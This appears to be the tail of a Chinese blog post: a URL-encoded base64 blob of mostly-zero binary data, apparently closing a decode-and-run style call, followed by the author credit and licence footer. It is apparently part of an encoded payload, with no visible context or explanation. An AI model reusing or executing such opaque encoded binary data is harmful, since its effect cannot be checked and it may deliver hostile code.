AAAAAAAAAAAAAAAAO0AAAABAAAAMAAAAAAAAAAAAAAAAAAAAEAQAAAAAAAANQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAARAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAQGAAAAAAAAPYAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAeBAAAAAAAACgBQAAAAAAABwAAAAtAAAACAAAAAAAAAAYAAAAAAAAAAkAAAADAAAAAAAAAAAAAAAAAAAAAAAAABgWAAAAAAAA%2BAEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA%3D%22%29%29%3B

文章作者: hh
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 hh !
  目录